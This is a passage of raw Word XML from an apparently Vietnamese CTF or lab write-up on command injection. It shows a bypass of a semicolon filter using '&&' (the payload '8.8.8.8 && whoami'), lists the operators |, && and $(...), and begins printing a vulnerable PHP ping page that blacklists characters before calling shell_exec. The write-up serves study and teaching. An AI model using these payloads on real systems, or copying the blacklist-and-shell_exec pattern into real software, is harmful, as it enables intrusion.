        <w:t>So với level 1, bài này đã</w:t>
      </w:r>
      <w:r w:rsidRPr="008566A5">
        <w:t xml:space="preserve"> có một bước kiểm tra đơn giản nhằm phát hiện ký tự ; trong chuỗi $target và chặn truy cập nếu phát hiện (die("Hacker detected!")), cơ chế này vẫn chưa đủ để ngăn chặn hoàn toàn các kỹ thuật Command Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536553F" w14:textId="77777777" w:rsidR="00B5377B" w:rsidRPr="00CF619D" w:rsidRDefault="00B5377B" w:rsidP="00B5377B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E700C9E" w14:textId="51B97D10" w:rsidR="008566A5" w:rsidRPr="008566A5" w:rsidRDefault="008566A5" w:rsidP="008566A5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="008566A5">
        <w:t>ó thể khai thác bằng cách sử dụng các ký tự hoặc cú pháp khác để chèn lệnh, chẳng hạn như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0F3F2" w14:textId="77777777" w:rsidR="008566A5" w:rsidRPr="008566A5" w:rsidRDefault="008566A5" w:rsidP="008566A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008566A5">
        <w:t>| (pipe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB7024" w14:textId="77777777" w:rsidR="008566A5" w:rsidRPr="008566A5" w:rsidRDefault="008566A5" w:rsidP="008566A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008566A5">
        <w:t>&amp;&amp; (thực thi nếu lệnh trước thành công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9FE20" w14:textId="77777777" w:rsidR="008566A5" w:rsidRPr="008566A5" w:rsidRDefault="008566A5" w:rsidP="008566A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008566A5">
        <w:t>`...` hoặc $(...) (thực thi lệnh con)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142946FF" w14:textId="77777777" w:rsidR="008566A5" w:rsidRDefault="008566A5" w:rsidP="00B5377B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA5756E" w14:textId="53FFB756" w:rsidR="00B5377B" w:rsidRPr="00184ED1" w:rsidRDefault="00B5377B" w:rsidP="00B5377B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D55E1" w14:textId="774C3B04" w:rsidR="00867762" w:rsidRPr="00867762" w:rsidRDefault="00867762" w:rsidP="00867762">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00867762">
        <w:t xml:space="preserve">Để xác định xem ứng dụng có thực sự ngăn chặn được lệnh chèn thông qua dấu ;, </w:t>
      </w:r>
      <w:r>
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="00867762">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="00867762">
        <w:t>thử cung cấp đầu vào có chứa ký tự</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> này để kết thúc câu lệnh hiện tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7C86E" w14:textId="000BA7B8" w:rsidR="00591128" w:rsidRDefault="009F0A3A">
      <w:r w:rsidRPr="009F0A3A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2DDD9D" wp14:editId="384A57AE">
            <wp:extent cx="5731510" cy="885190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="89546636" name="Picture 1" descr="A white rectangular object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6636" name="Picture 1" descr="A white rectangular object with a white border&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="885190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC8408" w14:textId="2A2EF1DE" w:rsidR="00867762" w:rsidRPr="00867762" w:rsidRDefault="00867762" w:rsidP="00867762">
      <w:r>
        <w:t xml:space="preserve">Ứng dụng đã </w:t>
      </w:r>
      <w:r w:rsidRPr="00867762">
        <w:t>phản hồi với thông báo "Hacker detected!"</w:t>
      </w:r>
      <w:r>
        <w:t>. Chứng tỏ dấu ; đã bị chặn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DEA5B" w14:textId="02E52DCD" w:rsidR="0068050B" w:rsidRPr="0068050B" w:rsidRDefault="0068050B" w:rsidP="00615A3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0068050B">
        <w:t xml:space="preserve">Tiếp theo, </w:t>
      </w:r>
      <w:r w:rsidR="00615A3F">
        <w:t xml:space="preserve">mình </w:t>
      </w:r>
      <w:r w:rsidRPr="0068050B">
        <w:t>tiến hành thử vượt qua cơ chế kiểm tra bằng cách sử dụng các cú pháp khác có khả năng kết thúc lệnh hoặc cho phép thực thi lệnh tiếp theo. Một ví dụ điển hình là toán tử &amp;&amp;, vốn sẽ thực thi câu lệnh phía sau nếu câu lệnh phía trước thực thi thành công.</w:t>
      </w:r>
      <w:r w:rsidRPr="0068050B">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Mình</w:t>
      </w:r>
      <w:r w:rsidRPr="0068050B">
        <w:t xml:space="preserve"> thử nghiệm với đầu vào như </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">8.8.8.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="0068050B">
        <w:t xml:space="preserve">&amp;&amp; whoami để kiểm tra xem hệ thống có xử lý đúng hay không. Nếu lệnh ping tới địa chỉ IP hợp lệ được thực thi thành công, thì lệnh whoami sẽ được thực hiện ngay sau </w:t>
      </w:r>
      <w:r w:rsidR="00615A3F">
        <w:t>đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0017A5" w14:textId="49DEADDA" w:rsidR="009F0A3A" w:rsidRDefault="009F0A3A">
      <w:r w:rsidRPr="009F0A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC058C0" wp14:editId="2BEE6C6E">
            <wp:extent cx="5731510" cy="1255395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1328883952"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83952" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1255395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EB19F7" w14:textId="3FA21A49" w:rsidR="00615A3F" w:rsidRDefault="00615A3F">
      <w:r>
        <w:t>Lệnh whoami đã được thực thi thành công, từ đó có thể tấn công command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02563C91" w14:textId="737C56CC" w:rsidR="00615A3F" w:rsidRPr="00615A3F" w:rsidRDefault="00615A3F">
      <w:r>
        <w:t>Thực hiện lấy flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B3A4A" w14:textId="65649EDD" w:rsidR="003B25AC" w:rsidRDefault="003B25AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B25AC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="602F725A" wp14:editId="57BAA5ED">
            <wp:extent cx="5731510" cy="1266190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1581442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42944" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1266190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFFC7AD" w14:textId="77777777" w:rsidR="003B25AC" w:rsidRDefault="003B25AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138E209F" w14:textId="77777777" w:rsidR="00615A3F" w:rsidRDefault="00615A3F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60679A2D" w14:textId="26C3AAD6" w:rsidR="00C35326" w:rsidRPr="00FF23DE" w:rsidRDefault="00C35326" w:rsidP="006C2EE6">
      <w:pPr>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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019294D5" w14:textId="77777777" w:rsidR="00C35326" w:rsidRPr="00FF23DE" w:rsidRDefault="00C35326" w:rsidP="00C35326">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15"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w14:paraId="7ED79BBA" w14:textId="77777777" w:rsidTr="00FC0ADE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D4A00B9" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0A6C15" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09E14849" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="229EC64E" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402A5123" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32778B66" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F2BA02C" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AC82D7" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70243730" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38661869" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC3443E" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411DDF08" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32020DF3" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13DDE72A" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F9FF77" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCA3D78" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A4D1C6" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16108714" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131ABE32" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03FF32EC" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70514865" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79534186" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A05B52F" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18047729" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E5C2460" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEC77D4" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DBDCAB9" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1516D25B" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2790BAE9" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> (strpos($target, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>";"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">) !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="765F4BEA" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Hacker detected!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F056F4" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> (strpos($target, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"&amp;"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">) !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F44ADB9" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Hacker detected!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C97F4D" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> (strpos($target, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"|"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">) !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152598CC" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Hacker detected!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E638C32" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C063BF2" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"ping"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06368E55" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 ping -c 4 </w:t>
            </w:r>
